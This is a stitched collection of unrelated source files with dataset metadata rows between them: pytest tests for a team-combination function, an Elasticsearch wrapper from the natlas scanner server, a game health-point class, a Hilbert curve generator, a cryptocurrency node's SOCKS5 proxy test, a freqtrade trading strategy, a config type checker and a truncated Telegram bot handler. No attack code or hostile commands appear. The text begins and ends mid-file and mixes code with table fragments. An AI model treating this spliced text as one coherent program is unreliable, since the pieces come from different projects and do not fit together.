# no one goes twice
(('Dante', 'Dante', 'Martin'), False),
])
def test_team_of_three_order_does_not_matter(test_input, expected):
combos = list(friends_teams(friends, team_size=3, order_does_matter=False))
assert len(combos) == 4
if expected:
assert test_input in combos
else:
assert test_input not in combos
@pytest.mark.parametrize('test_input,expected', [
(('Bob', 'Dante', 'Julian'), True),
(('Bob', 'Dante', 'Martin'), True),
(('Bob', 'Julian', 'Martin'), True),
(('Dante', 'Julian', 'Martin'), True),
# order does matter
(('Dante', 'Bob', 'Martin'), True),
(('Julian', 'Martin', 'Dante'), True),
])
def test_team_of_three_order_does_matter(test_input, expected):
combos = list(friends_teams(friends, team_size=3, order_does_matter=True))
assert len(combos) == 24
assert test_input in combos
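The module under test, ``bite17.py``, is not shown here; a hypothetical implementation of ``friends_teams`` that would satisfy the tests above is a thin wrapper over ``itertools``:
# Hypothetical bite17.py sketch (not the original author's code).
from itertools import combinations, permutations

def friends_teams(friends, team_size=2, order_does_matter=False):
    # combinations for unordered teams, permutations when order matters
    picker = permutations if order_does_matter else combinations
    return picker(friends, team_size)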
| 32.144578
| 79
| 0.609445
|
a6b46d9c3c572dad37d2c982659f0162f2c5a739
| 10,770
|
py
|
Python
|
natlas-server/app/elastic.py
|
thesubtlety/natlas
|
c7e6afc44244c5e0bb6dcadb3d11a45bd445540d
|
[
"Apache-2.0"
] | null | null | null |
natlas-server/app/elastic.py
|
thesubtlety/natlas
|
c7e6afc44244c5e0bb6dcadb3d11a45bd445540d
|
[
"Apache-2.0"
] | null | null | null |
natlas-server/app/elastic.py
|
thesubtlety/natlas
|
c7e6afc44244c5e0bb6dcadb3d11a45bd445540d
|
[
"Apache-2.0"
] | null | null | null |
import json
import elasticsearch
import random
import os
import subprocess
class Elastic:
es = None
status = False
    errorinfo = ''
natlasPipelines = ["geoip"]
natlasIndices = ["nmap", "nmap_history"]
def __init__(self, elasticURL):
try:
self.es = elasticsearch.Elasticsearch(elasticURL, timeout=5, max_retries=1)
if "cluster_name" in self.es.nodes.info():
self.status = True
if self.status:
for pipeline in self.natlasPipelines:
try:
self.es.ingest.get_pipeline(pipeline)
except elasticsearch.exceptions.NotFoundError:
print("{} pipeline not found, initiating...".format(pipeline))
myPipelineInit = {"description": "Add GeoIP info from IP",
"processors": [{
"geoip": {"field":"ip"}
}]
}
try:
self.es.ingest.put_pipeline(pipeline, body=myPipelineInit)
except Exception as e:
print("Error adding geoip pipeline, continuing: %s" % e)
for index in self.natlasIndices: # initialize nmap and nmap_history and give them mappings for known necessary types
if not self.es.indices.exists(index):
myIndexInit = {"mappings":{"_doc":{"properties":{
"ctime": {"type":"date"},
"agent": {"type":"keyword"},
"agent_version": {"type":"keyword"},
"scan_reason": {"type":"keyword"},
"scan_start": {"type":"date"},
"scan_stop": {"type":"date"},
"elapsed": {"type":"integer"},
"tags": {"type":"keyword"},
"port_count": {"type":"integer"},
"port_str": {"type":"text"},
"is_up": {"type":"boolean"},
"ip": {"type":"ip"},
"scan_id": {"type":"keyword"},
"nmap_data": {"type": "text"},
"xml_data": {"type": "text", "index":"false"},
"gnmap_data": {"type": "text", "index": "false"},
"httpsheadshot": {"type": "binary"},
"httpsheadshot": {"type": "binary"},
"vncheadshot": {"type":"binary"},
"geoip": {"properties": {
"location" : { "type" : "geo_point" }
}},
"ports": {"type": "nested", "properties": {
"id" : {"type": "keyword"},
"number" : {"type": "integer"},
"protocol": {"type": "keyword"},
"state": {"type": "keyword"},
"reason": {"type": "text"},
"banner": {"type": "text"},
"service": {
"properties": {
"name": {"type": "keyword"},
"product": {"type": "keyword"},
"version": {"type": "keyword"},
"ostype": {"type": "keyword"},
"conf": {"type": "integer"},
"cpelist": {"type": "text"},
"method": {"type": "text"},
"extrainfo": {"type": "text"},
"tunnel": {"type": "keyword"}
}
},
"scripts": {
"properties": {
"id": {"type": "text"},
"output": {"type": "text"}
}
}
}}
}}}}
self.es.indices.create(index, body=myIndexInit)
except elasticsearch.exceptions.NotFoundError:
self.errorinfo = 'Cluster Not Found'
except:
self.errorinfo = 'Could not establish connection'
def search(self, query, limit, offset):
if not self.status:
return 0,[]
if query == '':
query = 'nmap'
try:
result = self.es.search(index="nmap", doc_type="_doc", body=\
{
"size": limit,
"from": offset,
"query": {
"bool": {
"must": [
{
"query_string": {
"query": query,
"fields": ["nmap_data"],
"default_operator": "AND"
}
},
{
"term": {
"is_up": True
}
},
{
"range": {
"port_count": {
"gt": 0
}
}
}
]
}
},
"sort": {
"ctime": {
"order": "desc"
}
}
})
except:
return 0, [] # search borked, return nothing
results = [] # collate results
for thing in result['hits']['hits']:
results.append(thing['_source'])
return result['hits']['total'], results
def totalHosts(self):
result = self.es.count(index="nmap", doc_type="_doc")
return result["count"]
def newhost(self, host):
if not self.status:
return
ip = str(host['ip'])
# broken in ES6
self.es.index(index='nmap_history', doc_type='_doc', body=host)
self.es.index(index='nmap', doc_type='_doc', id=ip, body=host, pipeline='geoip')
# Run host enrichment script if enabled
if os.environ.get('ENRICH_FILE_PATH'):
filename = os.environ.get('ENRICH_FILE_PATH')
proc = subprocess.Popen(["python3",filename,ip], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = proc.communicate()
if err:
print("Error enriching host data | {}, ip: {}".format(filename, ip))
print("{}".format(err))
def gethost(self, ip):
if not self.status:
return 0,[]
result = self.es.search(index='nmap_history', doc_type='_doc', body={"size": 1, "query": {"query_string": {
'query': ip, "fields": ["ip"], "default_operator": "AND"}}, "sort": {"ctime": {"order": "desc"}}})
if result['hits']['total'] == 0:
return 0, None
return result['hits']['total'], result['hits']['hits'][0]['_source']
def gethost_history(self, ip, limit, offset):
if not self.status:
return 0,[]
result = self.es.search(index='nmap_history', doc_type='_doc', body={"size": limit, "from": offset, "query": {
"query_string": {'query': ip, "fields": ["ip"], "default_operator": "AND"}}, "sort": {"ctime": {"order": "desc"}}})
results = [] # collate results
for thing in result['hits']['hits']:
results.append(thing['_source'])
return result['hits']['total'], results
def gethost_scan_id(self, scan_id):
if not self.status:
return 0,[]
result = self.es.search(index='nmap_history', doc_type='_doc', body={"size": 1, "query": {
"query_string": {'query': scan_id, "fields": ["scan_id"], "default_operator": "AND"}}, "sort": {"ctime": {"order": "desc"}}})
if result['hits']['total'] == 0:
return 0, None
return result['hits']['total'], result['hits']['hits'][0]['_source']
def delete_scan(self, scan_id):
if not self.status:
return -1
migrate = False
hostResult = self.es.search(index='nmap', doc_type='_doc', body={"size": 1, "query": {
"query_string": {'query': scan_id, "fields": ["scan_id"]}}})
if hostResult['hits']['total'] != 0:
# we're deleting the most recent scan result and need to pull the next most recent into the nmap index
# otherwise you won't find the host when doing searches or browsing
ipaddr = hostResult['hits']['hits'][0]['_source']['ip']
twoscans = self.es.search(index="nmap_history", doc_type="_doc", body={"size":2, "query": {
"query_string": {"query": ipaddr, "fields": ["ip"]}}, "sort": {"ctime": {"order": "desc"}}})
if len(twoscans['hits']['hits']) != 2:
# we're deleting the only scan for this host so we don't need to migrate old scan data into the nmap index
migrate = False
else:
migrate = True
result = self.es.delete_by_query(index="nmap,nmap_history", doc_type="_doc", body={"query": {
"query_string": {"query": scan_id, "fields": ["scan_id"], "default_operator": "AND"}}})
if migrate:
self.es.index(index='nmap', doc_type='_doc', id=ipaddr, body=twoscans['hits']['hits'][1]['_source'])
return result["deleted"]
def delete_host(self, ip):
if not self.status:
return -1
deleted = self.es.delete_by_query(index="nmap,nmap_history", doc_type="_doc", body={"query": {
"query_string": {'query': ip, "fields": ["ip", "id"], "default_operator": "AND"}}, "sort": {"ctime": {"order": "desc"}}})
return deleted["deleted"]
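A minimal usage sketch, assuming an Elasticsearch node is reachable at the given URL (the natlas server normally constructs this object from its application config):
es = Elastic("http://localhost:9200")  # hypothetical local cluster
if es.status:
    total, hits = es.search("ssh", limit=10, offset=0)
    print(total, [hit["ip"] for hit in hits])
else:
    print("not connected:", es.errorinfo)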
| 46.623377
| 157
| 0.402878
|
a6edc395e28af52770d7515daa9f771577b22bf4
| 3,030
|
py
|
Python
|
HealthPoint.py
|
serin-delaunay/fleohsis
|
b4e824eb6e0ccf7aa7cb2435936656399c92553a
|
[
"MIT"
] | 1
|
2018-06-12T11:46:17.000Z
|
2018-06-12T11:46:17.000Z
|
HealthPoint.py
|
serin-delaunay/fleohsis
|
b4e824eb6e0ccf7aa7cb2435936656399c92553a
|
[
"MIT"
] | 10
|
2017-03-06T04:42:58.000Z
|
2017-03-12T20:48:42.000Z
|
HealthPoint.py
|
serin-delaunay/fleohsis
|
b4e824eb6e0ccf7aa7cb2435936656399c92553a
|
[
"MIT"
] | null | null | null |
# coding: utf-8
from typing import List, TypeVar
from obsub import event
from sortedcontainers import SortedListWithKey
from AbilityBag import AbilityBag
from Abilities import get_ability
from Ability import Ability
T = TypeVar('T', bound='HealthPoint')
class HealthPoint(object):
def __init__(self, name : str,
common_abilities : List[str],
healthy_abilities : List[str],
damaged_abilities : List[str]) -> None:
self.name = name
self._list_common_abilities = list(common_abilities)
self._list_healthy_abilities = list(healthy_abilities)
self._list_damaged_abilities = list(damaged_abilities)
self._healthy_abilities = AbilityBag(self._list_common_abilities)
self._damaged_abilities = AbilityBag(self._list_common_abilities)
self._healthy_abilities.add_abilities(self._list_healthy_abilities)
self._damaged_abilities.add_abilities(self._list_damaged_abilities)
self.description = self.make_description()
self.__is_healthy = True
def _get_health(self) -> bool:
return self.__is_healthy
def _set_health(self, health) -> None:
if self.__is_healthy != health:
self.before_health_change()
self.__is_healthy = health
self.after_health_change()
@event
def before_health_change(self): pass
@event
def after_health_change(self): pass
is_healthy = property(_get_health, _set_health)
def make_description(self) -> str:
healthy_description = '\n'.join(x.description
for x in self._healthy_abilities.abilities()
if not x.hidden)
damaged_description = '\n'.join(x.description
for x in self._damaged_abilities.abilities()
if not x.hidden)
descriptions = []
if healthy_description:
descriptions.append('Healthy:\n' + healthy_description)
if damaged_description:
descriptions.append('Damaged:\n' + damaged_description)
return '\n'.join(descriptions)
def get_abilities(self) -> AbilityBag:
if self.is_healthy:
return self._healthy_abilities
else:
return self._damaged_abilities
def copy(self : T) -> T:
return HealthPoint(self.name,
self._list_common_abilities,
self._list_healthy_abilities,
self._list_damaged_abilities)
def __repr__(self) -> str:
return "HealthPoint: {0}({1})".format(self.name,
"healthy" if self.is_healthy
else "damaged")
def summary(self) -> str:
return '[color=white]{0}({1}[color=white])'.format(
self.name,
"[color=green]healthy" if self.is_healthy
else "[color=red]damaged")
| 42.676056
| 84
| 0.605941
|
aa0236f798ad05a959d939f9e8e08144c95297e2
| 2,996
|
py
|
Python
|
Marker5/Hilbert.py
|
varsheshjp/game
|
2a47f2099aa0538301815272f749c63aa11e6ce1
|
[
"MIT"
] | null | null | null |
Marker5/Hilbert.py
|
varsheshjp/game
|
2a47f2099aa0538301815272f749c63aa11e6ce1
|
[
"MIT"
] | null | null | null |
Marker5/Hilbert.py
|
varsheshjp/game
|
2a47f2099aa0538301815272f749c63aa11e6ce1
|
[
"MIT"
] | null | null | null |
def make_mapping(m):
"""
Return a dictionary built up of a single mapping m rotated and flipped.
The keys are 2 character strings where
the first is one of [,],u,n and the second is either 'a'nticlockwise or
    'c'lockwise. The values are lists of (integer, tuple) pairs which
specify how to split up the 4 quadrants and which (shape, direction)
pair to apply to it.
The quadrants are
---------
| 0 | 1 |
---------
| 2 | 3 |
---------
"""
quads = [0, 1, 3, 2] # quadrants in clockwise order
shapes = ['u', '[', 'n', ']'] # shapes rotated clockwise
rots = ['a', 'c'] # possible rotations
def next(item, list, pos=1):
"""
        Given a list and an item, returns the item in the list
pos places after the item.
Wraps around the list at the boundaries
"""
return list[(list.index(item) + pos) % len(list)]
other_direction = lambda x: next(x, rots)
next_quadrant = lambda x: next(x, quads)
next_shape = lambda x: next(x, shapes)
def rotate(key):
rotated_value = [(next_quadrant(quad), next_shape(shape) + dirn)
for quad, (shape, dirn) in m[key]]
shape, dirn = key
return next_shape(shape) + dirn, rotated_value
def flip(key):
flipped_value = list(m[key])
flipped_value.reverse()
flipped_value = [(quad, shape+other_direction(dirn))
for quad, (shape, dirn) in flipped_value]
shape, dirn = key
return shape + other_direction(dirn), flipped_value
key = list(m.keys())[0]
while True:
key, value = rotate(key)
if key in m:
break
m[key] = value
for key in list(m.keys()):
newkey, value = flip(key)
m[newkey] = value
return m
hilbert_mapping = make_mapping(
{'ua': [(0, ']c'), (2, 'ua'), (3, 'ua'), (1, '[c')]})
arrayOfPoints=[]
def apply_mapping(ar, mapping, pos):
"""
split the 2d array ar into 4 quadrants and call
apply_mapping recursively for each member of map[pos]
If ar is 1x1, yield ar
"""
try:
y, x = ar.shape[:2]
except ValueError:
print(ar, ar.shape)
if y <= 1 and x <= 1:
yield ar[0, 0, ...]
else:
# quad indices here are:
# 0 1
# 2 3
# (nb unlike hilbert_v1!)
first_half = slice(None,int( x / 2))
secnd_half = slice(int( x / 2), None)
quads = [ar[first_half, first_half, ...],
ar[first_half, secnd_half, ...],
ar[secnd_half, first_half, ...],
ar[secnd_half, secnd_half, ...]]
for quadrant, newpos in mapping[pos]:
for x in apply_mapping(quads[quadrant], mapping, newpos):
yield x
def hilbert(ar):
for x in apply_mapping(ar, hilbert_mapping, 'ua'):
yield x
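A hedged example of driving the generator above: traverse a 4x4 grid of (row, column) pairs in Hilbert order. It assumes numpy, which the functions above already expect of their input, and a side length that is a power of two so the recursive split bottoms out cleanly.
import numpy as np

side = 4
# grid[i, j] == (i, j), shape (side, side, 2)
grid = np.stack(np.meshgrid(np.arange(side), np.arange(side), indexing='ij'), axis=-1)
for point in hilbert(grid):
    print(point.tolist())  # 16 coordinate pairs along the curve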
| 32.215054
| 76
| 0.535714
|
7dedab524f481d15bafbd2edd6c272f21b058669
| 8,367
|
py
|
Python
|
test/functional/feature_proxy.py
|
mmontuori/quarkcoin
|
c4da680fd4d852e3ba835d7fd23181a8f08e47db
|
[
"MIT"
] | null | null | null |
test/functional/feature_proxy.py
|
mmontuori/quarkcoin
|
c4da680fd4d852e3ba835d7fd23181a8f08e47db
|
[
"MIT"
] | 12
|
2021-05-31T22:55:50.000Z
|
2021-06-04T02:30:02.000Z
|
test/functional/feature_proxy.py
|
mmontuori/quarkcoin
|
c4da680fd4d852e3ba835d7fd23181a8f08e47db
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) 2015-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test monetad with different proxy configuration.
Test plan:
- Start monetad's with different proxy configurations
- Use addnode to initiate connections
- Verify that proxies are connected to, and the right connection command is given
- Proxy configurations to test on monetad side:
- `-proxy` (proxy everything)
- `-onion` (proxy just onions)
- `-proxyrandomize` Circuit randomization
- Proxy configurations to test on proxy side,
- support no authentication (other proxy)
- support no authentication + user/pass authentication (Tor)
- proxy on IPv6
- Create various proxies (as threads)
- Create monetads that connect to them
- Manipulate the monetads using addnode (onetry) and observe effects
addnode connect to IPv4
addnode connect to IPv6
addnode connect to onion
addnode connect to generic DNS name
"""
import socket
import os
from test_framework.socks5 import Socks5Configuration, Socks5Command, Socks5Server, AddressType
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import (
PORT_MIN,
PORT_RANGE,
assert_equal,
)
from test_framework.netutil import test_ipv6_local
RANGE_BEGIN = PORT_MIN + 2 * PORT_RANGE # Start after p2p and rpc ports
class ProxyTest(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 4
self.setup_clean_chain = True
def setup_nodes(self):
self.have_ipv6 = test_ipv6_local()
# Create two proxies on different ports
# ... one unauthenticated
self.conf1 = Socks5Configuration()
self.conf1.addr = ('127.0.0.1', RANGE_BEGIN + (os.getpid() % 1000))
self.conf1.unauth = True
self.conf1.auth = False
# ... one supporting authenticated and unauthenticated (Tor)
self.conf2 = Socks5Configuration()
self.conf2.addr = ('127.0.0.1', RANGE_BEGIN + 1000 + (os.getpid() % 1000))
self.conf2.unauth = True
self.conf2.auth = True
if self.have_ipv6:
# ... one on IPv6 with similar configuration
self.conf3 = Socks5Configuration()
self.conf3.af = socket.AF_INET6
self.conf3.addr = ('::1', RANGE_BEGIN + 2000 + (os.getpid() % 1000))
self.conf3.unauth = True
self.conf3.auth = True
else:
self.log.warning("Testing without local IPv6 support")
self.serv1 = Socks5Server(self.conf1)
self.serv1.start()
self.serv2 = Socks5Server(self.conf2)
self.serv2.start()
if self.have_ipv6:
self.serv3 = Socks5Server(self.conf3)
self.serv3.start()
# Note: proxies are not used to connect to local nodes
# this is because the proxy to use is based on CService.GetNetwork(), which return NET_UNROUTABLE for localhost
args = [
['-listen', '-proxy=%s:%i' % (self.conf1.addr),'-proxyrandomize=1'],
['-listen', '-proxy=%s:%i' % (self.conf1.addr),'-onion=%s:%i' % (self.conf2.addr),'-proxyrandomize=0'],
['-listen', '-proxy=%s:%i' % (self.conf2.addr),'-proxyrandomize=1'],
[]
]
if self.have_ipv6:
args[3] = ['-listen', '-proxy=[%s]:%i' % (self.conf3.addr),'-proxyrandomize=0', '-noonion']
self.add_nodes(self.num_nodes, extra_args=args)
self.start_nodes()
def node_test(self, node, proxies, auth, test_onion=True):
rv = []
# Test: outgoing IPv4 connection through node
node.addnode("15.61.23.23:1234", "onetry")
cmd = proxies[0].queue.get()
assert(isinstance(cmd, Socks5Command))
# Note: bitcoind's SOCKS5 implementation only sends atyp DOMAINNAME, even if connecting directly to IPv4/IPv6
assert_equal(cmd.atyp, AddressType.DOMAINNAME)
assert_equal(cmd.addr, b"15.61.23.23")
assert_equal(cmd.port, 1234)
if not auth:
assert_equal(cmd.username, None)
assert_equal(cmd.password, None)
rv.append(cmd)
if self.have_ipv6:
# Test: outgoing IPv6 connection through node
node.addnode("[1233:3432:2434:2343:3234:2345:6546:4534]:5443", "onetry")
cmd = proxies[1].queue.get()
assert(isinstance(cmd, Socks5Command))
# Note: bitcoind's SOCKS5 implementation only sends atyp DOMAINNAME, even if connecting directly to IPv4/IPv6
assert_equal(cmd.atyp, AddressType.DOMAINNAME)
assert_equal(cmd.addr, b"1233:3432:2434:2343:3234:2345:6546:4534")
assert_equal(cmd.port, 5443)
if not auth:
assert_equal(cmd.username, None)
assert_equal(cmd.password, None)
rv.append(cmd)
if test_onion:
# Test: outgoing onion connection through node
node.addnode("bitcoinostk4e4re.onion:9333", "onetry")
cmd = proxies[2].queue.get()
assert(isinstance(cmd, Socks5Command))
assert_equal(cmd.atyp, AddressType.DOMAINNAME)
assert_equal(cmd.addr, b"bitcoinostk4e4re.onion")
assert_equal(cmd.port, 9333)
if not auth:
assert_equal(cmd.username, None)
assert_equal(cmd.password, None)
rv.append(cmd)
# Test: outgoing DNS name connection through node
node.addnode("node.noumenon:9333", "onetry")
cmd = proxies[3].queue.get()
assert(isinstance(cmd, Socks5Command))
assert_equal(cmd.atyp, AddressType.DOMAINNAME)
assert_equal(cmd.addr, b"node.noumenon")
assert_equal(cmd.port, 9333)
if not auth:
assert_equal(cmd.username, None)
assert_equal(cmd.password, None)
rv.append(cmd)
return rv
def run_test(self):
# basic -proxy
self.node_test(self.nodes[0], [self.serv1, self.serv1, self.serv1, self.serv1], False)
# -proxy plus -onion
self.node_test(self.nodes[1], [self.serv1, self.serv1, self.serv2, self.serv1], False)
# -proxy plus -onion, -proxyrandomize
rv = self.node_test(self.nodes[2], [self.serv2, self.serv2, self.serv2, self.serv2], True)
# Check that credentials as used for -proxyrandomize connections are unique
credentials = set((x.username,x.password) for x in rv)
assert_equal(len(credentials), len(rv))
if self.have_ipv6:
# proxy on IPv6 localhost
self.node_test(self.nodes[3], [self.serv3, self.serv3, self.serv3, self.serv3], False, False)
def networks_dict(d):
r = {}
for x in d['networks']:
r[x['name']] = x
return r
# test RPC getnetworkinfo
n0 = networks_dict(self.nodes[0].getnetworkinfo())
for net in ['ipv4','ipv6','onion']:
assert_equal(n0[net]['proxy'], '%s:%i' % (self.conf1.addr))
assert_equal(n0[net]['proxy_randomize_credentials'], True)
assert_equal(n0['onion']['reachable'], True)
n1 = networks_dict(self.nodes[1].getnetworkinfo())
for net in ['ipv4','ipv6']:
assert_equal(n1[net]['proxy'], '%s:%i' % (self.conf1.addr))
assert_equal(n1[net]['proxy_randomize_credentials'], False)
assert_equal(n1['onion']['proxy'], '%s:%i' % (self.conf2.addr))
assert_equal(n1['onion']['proxy_randomize_credentials'], False)
assert_equal(n1['onion']['reachable'], True)
n2 = networks_dict(self.nodes[2].getnetworkinfo())
for net in ['ipv4','ipv6','onion']:
assert_equal(n2[net]['proxy'], '%s:%i' % (self.conf2.addr))
assert_equal(n2[net]['proxy_randomize_credentials'], True)
assert_equal(n2['onion']['reachable'], True)
if self.have_ipv6:
n3 = networks_dict(self.nodes[3].getnetworkinfo())
for net in ['ipv4','ipv6']:
assert_equal(n3[net]['proxy'], '[%s]:%i' % (self.conf3.addr))
assert_equal(n3[net]['proxy_randomize_credentials'], False)
assert_equal(n3['onion']['reachable'], False)
if __name__ == '__main__':
ProxyTest().main()
| 41.420792
| 121
| 0.625672
|
19f3992a92389c4c62d27316c81136da744f2ce2
| 308
|
py
|
Python
|
xoeuf/tests/test_xoeuf_api/tests/__init__.py
|
merchise-autrement/xoeuf
|
583a0faa345480e73110d467203eefd142b0a710
|
[
"BSD-3-Clause"
] | 3
|
2015-05-16T04:40:14.000Z
|
2016-01-26T05:36:20.000Z
|
xoeuf/tests/test_xoeuf_api/tests/__init__.py
|
merchise-autrement/xoeuf
|
583a0faa345480e73110d467203eefd142b0a710
|
[
"BSD-3-Clause"
] | null | null | null |
xoeuf/tests/test_xoeuf_api/tests/__init__.py
|
merchise-autrement/xoeuf
|
583a0faa345480e73110d467203eefd142b0a710
|
[
"BSD-3-Clause"
] | 1
|
2017-03-23T23:08:50.000Z
|
2017-03-23T23:08:50.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# ---------------------------------------------------------------------
# Copyright (c) Merchise Autrement [~º/~] and Contributors
# All rights reserved.
#
# This is free software; you can do what the LICENCE file allows you to.
#
from . import test_api # noqa
| 30.8
| 72
| 0.525974
|
43109446c2af035cec1dba9aa1a3b0ac72ca68f7
| 1,818
|
py
|
Python
|
strategies/Pump.py
|
igolaizola/freqtrade
|
7475ac27c81922d39d90e1234199b1cb174c1166
|
[
"MIT"
] | 15
|
2021-03-28T20:41:26.000Z
|
2021-07-20T11:20:11.000Z
|
strategies/Pump.py
|
igolaizola/freqtrade
|
7475ac27c81922d39d90e1234199b1cb174c1166
|
[
"MIT"
] | null | null | null |
strategies/Pump.py
|
igolaizola/freqtrade
|
7475ac27c81922d39d90e1234199b1cb174c1166
|
[
"MIT"
] | 5
|
2021-03-29T20:07:59.000Z
|
2022-02-22T22:10:57.000Z
|
# --- Do not remove these libs ---
from freqtrade.strategy import IStrategy, merge_informative_pair
from datetime import datetime, timedelta
from freqtrade.persistence import Trade
from pandas import DataFrame
import pandas
# --------------------------------
class Pump(IStrategy):
"""
author@: igolaizola
pumps with external buy signals using /force_buy
"""
# Minimal ROI designed for the strategy.
    # adjust based on market conditions. We would recommend keeping it low for quick turnarounds
# This attribute will be overridden if the config file contains "minimal_roi"
minimal_roi = {
"0": 0.5
}
# Optimal timeframe for the strategy
timeframe = '1m'
# Optimal stoploss designed for the strategy
stoploss = -0.10
trailing_stop = True
use_custom_stoploss = True
def custom_stoploss(self, pair: str, trade: 'Trade', current_time: datetime,
current_rate: float, current_profit: float, **kwargs) -> float:
# Make sure you have the longest interval first - these conditions are evaluated from top to bottom.
if current_time - timedelta(minutes=120) > trade.open_date_utc:
return -0.02
elif current_time - timedelta(minutes=60) > trade.open_date_utc:
return -0.05
return -0.10
def populate_indicators(self, dataframe: DataFrame, metadata: dict) -> DataFrame:
return dataframe
def populate_buy_trend(self, dataframe: DataFrame, metadata: dict) -> DataFrame:
dataframe.loc[
(
),
'buy'] = 1
return dataframe
def populate_sell_trend(self, dataframe: DataFrame, metadata: dict) -> DataFrame:
dataframe.loc[
(
),
'sell'] = 1
return dataframe
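As a plain-Python restatement of the stoploss schedule above (outside freqtrade, so nothing here depends on ``Trade`` or on instantiating the strategy): the stop tightens from -10% to -5% after 60 minutes and to -2% after 120 minutes.
from datetime import datetime, timedelta

def stoploss_for(open_time, now):
    # mirrors the conditions in Pump.custom_stoploss, longest interval first
    if now - timedelta(minutes=120) > open_time:
        return -0.02
    elif now - timedelta(minutes=60) > open_time:
        return -0.05
    return -0.10

opened = datetime(2021, 1, 1, 12, 0)
for minutes in (30, 90, 150):
    print(minutes, stoploss_for(opened, opened + timedelta(minutes=minutes)))
# -> 30 -0.1, 90 -0.05, 150 -0.02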
| 31.894737
| 108
| 0.638614
|
ceacc6af1ca867f3ffcc7847d5acabc1018b677d
| 172
|
py
|
Python
|
guitarHarmony/register.py
|
fuyuan-li/Guitar-Harmony
|
8cd836782bb19cbf39ce4a4722ea52d7988b2cc4
|
[
"MIT"
] | 5
|
2020-03-15T19:09:59.000Z
|
2021-02-26T03:32:38.000Z
|
guitarHarmony/register.py
|
fuyuan-li/Guitar-Harmony
|
8cd836782bb19cbf39ce4a4722ea52d7988b2cc4
|
[
"MIT"
] | 1
|
2020-03-30T06:46:17.000Z
|
2020-03-30T06:46:17.000Z
|
guitarHarmony/register.py
|
fuyuan-li/Guitar-Harmony
|
8cd836782bb19cbf39ce4a4722ea52d7988b2cc4
|
[
"MIT"
] | 1
|
2020-03-30T05:59:24.000Z
|
2020-03-30T05:59:24.000Z
|
# -*- coding: utf-8 -*-
# @Author: Xi He
# @Date: 2020-03-21 12:34:40
# @Last Modified by: Xi He
# @Last Modified time: 2020-03-21 12:36:06
from .helper import CONSTANT
| 28.666667
| 42
| 0.639535
|
0d24368ac235cc6c012368ffd0a757711cec3ceb
| 712
|
py
|
Python
|
dkeras/config/process_config.py
|
gndctrl2mjrtm/dkeras
|
97bcf176dbc96bd52cc6e19283159a6e73f0a4dc
|
[
"MIT"
] | 195
|
2019-09-05T08:41:53.000Z
|
2022-03-09T14:04:07.000Z
|
dkeras/config/process_config.py
|
gndctrl2mjrtm/dkeras
|
97bcf176dbc96bd52cc6e19283159a6e73f0a4dc
|
[
"MIT"
] | 4
|
2019-11-27T00:45:31.000Z
|
2020-03-11T14:12:44.000Z
|
dkeras/config/process_config.py
|
gndctrl2mjrtm/dkeras
|
97bcf176dbc96bd52cc6e19283159a6e73f0a4dc
|
[
"MIT"
] | 14
|
2019-11-27T17:32:36.000Z
|
2022-02-12T03:55:15.000Z
|
#!/bin/env/python
# -*- encoding: utf-8 -*-
"""
"""
from __future__ import print_function, division
import dkeras.config.config as config
type_dict = {
'CPU_OVERLOAD_LIMIT': float,
'N_CPUS_PER_SERVER': int,
'N_CPUS_PER_WORKER': int
}
def verify_types():
"""
:return: None
"""
local_vars = list(locals().keys())
config_vars = dir(config)
for v_name in type_dict.keys():
var = config.__dict__[v_name]
if not isinstance(var, type_dict[v_name]):
raise TypeError(
"Config variable should be type: {}, not type: {}".format(
                    type_dict[v_name], type(var).__name__))
if __name__ == "__main__":
verify_types()
| 20.342857
| 74
| 0.599719
|
43a7e5b1d304bab2f4e750abab66ec03ecf1d69d
| 4,344
|
py
|
Python
|
venv/lib/python3.7/site-packages/telegram/ext/choseninlineresulthandler.py
|
danigfavero/ada
|
3c3842023c22510eedf207b23c418f22389622aa
|
[
"MIT"
] | 1
|
2021-08-20T05:43:20.000Z
|
2021-08-20T05:43:20.000Z
|
venv/lib/python3.6/site-packages/telegram/ext/choseninlineresulthandler.py
|
assaufianggie/VerraBot
|
cbe46ccb219c2972871e760268b427e1f8e79f93
|
[
"MIT"
] | 5
|
2021-03-31T19:34:39.000Z
|
2021-12-13T20:29:07.000Z
|
venv/lib/python3.6/site-packages/telegram/ext/choseninlineresulthandler.py
|
assaufianggie/VerraBot
|
cbe46ccb219c2972871e760268b427e1f8e79f93
|
[
"MIT"
] | 1
|
2020-09-02T07:24:59.000Z
|
2020-09-02T07:24:59.000Z
|
#!/usr/bin/env python
#
# A library that provides a Python interface to the Telegram Bot API
# Copyright (C) 2015-2018
# Leandro Toledo de Souza <devs@python-telegram-bot.org>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser Public License for more details.
#
# You should have received a copy of the GNU Lesser Public License
# along with this program. If not, see [http://www.gnu.org/licenses/].
"""This module contains the ChosenInlineResultHandler class."""
from telegram import Update
from .handler import Handler
class ChosenInlineResultHandler(Handler):
"""Handler class to handle Telegram updates that contain a chosen inline result.
Attributes:
callback (:obj:`callable`): The callback function for this handler.
pass_update_queue (:obj:`bool`): Determines whether ``update_queue`` will be
passed to the callback function.
pass_job_queue (:obj:`bool`): Determines whether ``job_queue`` will be passed to
the callback function.
pass_user_data (:obj:`bool`): Determines whether ``user_data`` will be passed to
the callback function.
pass_chat_data (:obj:`bool`): Determines whether ``chat_data`` will be passed to
the callback function.
Note:
:attr:`pass_user_data` and :attr:`pass_chat_data` determine whether a ``dict`` you
can use to keep any data in will be sent to the :attr:`callback` function. Related to
either the user or the chat that the update was sent in. For each update from the same user
or in the same chat, it will be the same ``dict``.
Note that this is DEPRECATED, and you should use context based callbacks. See
https://git.io/fxJuV for more info.
Args:
callback (:obj:`callable`): The callback function for this handler. Will be called when
:attr:`check_update` has determined that an update should be processed by this handler.
Callback signature for context based API:
``def callback(update: Update, context: CallbackContext)``
The return value of the callback is usually ignored except for the special case of
:class:`telegram.ext.ConversationHandler`.
